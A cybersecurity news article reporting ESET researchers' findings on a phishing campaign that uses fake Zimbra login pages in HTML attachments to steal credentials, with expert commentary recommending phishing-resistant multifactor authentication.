Researchers Warn About New Mass-expanding Phishing Campaign Attacking Zimbra Users

Highlights:

• Potential victims receive emails from the campaign’s creators containing an HTML file with a phishing page.
• A false Zimbra login page tailored to the targeted organization is shown when a user clicks on the attachment.

Zimbra account user credentials are the subject of a new, widely disseminated phishing attempt, according to security researchers at ESET s.r.o.

The ongoing campaign, first discovered in April, is aimed at numerous small and medium-sized enterprises and government organizations. Users in Poland have been targeted the most so far, but targets have also been found in other European and Latin American nations, including Ukraine, Italy, France, and Ecuador.

Although Zimbra Collaboration, a software suite that includes an email server and web client, can proliferate and infiltrate companies, the researchers point out that the campaign is not very technically complex.

Potential victims receive emails from the campaign’s creators containing an HTML file with a phishing page. The emails instruct the potential victim to click on the attached file to solve an issue of an email server update, account cancellation, or other problems.

A false Zimbra login page tailored to the targeted organization is shown when a user clicks on the attachment. Victims who have been duped up to this point enter their credentials on the incorrect login page, which are collected and sent back to a service under the control of the attacks.

Viktor Šperka, an ESET researcher who discovered the campaign, stated, “Adversaries leverage the fact that HTML attachments contain legitimate code, with the only telltale element being a link pointing to the malicious host. In this manner, it is much easier to circumvent reputation-based anti-spam policies, especially compared with more prevalent phishing techniques, where a malicious link is directly placed in the email body.”

The attackers then access the impacted account using those credentials. When an administrator account has been hacked, the attackers construct new mailboxes that are used to send fresh phishing emails to other targets.

Roger Grimes, Data-Driven Defense Evangelist at KnowBe4 Inc., a cybersecurity company, reported, “What’s interesting to me is that previous commenters are saying this isn’t a sophisticated phishing campaign. The initial phishing email redirects potential victims to a fake login page that contains their company’s logo and name. Both of these items significantly increase the chances that potential victims will be fooled and provide login credentials. I’m not sure this is the most sophisticated phishing campaign ever, but it’s not an unsophisticated one either.”

Grimes mentioned that people using Zimbra must get serious about their security concerns. “Step one is enabling phishing-resistant multifactor authentication on all Zimbra users and admins. If that had been done, these accounts, some of them admin, would not have been taken over by this latest phishing campaign,” he added.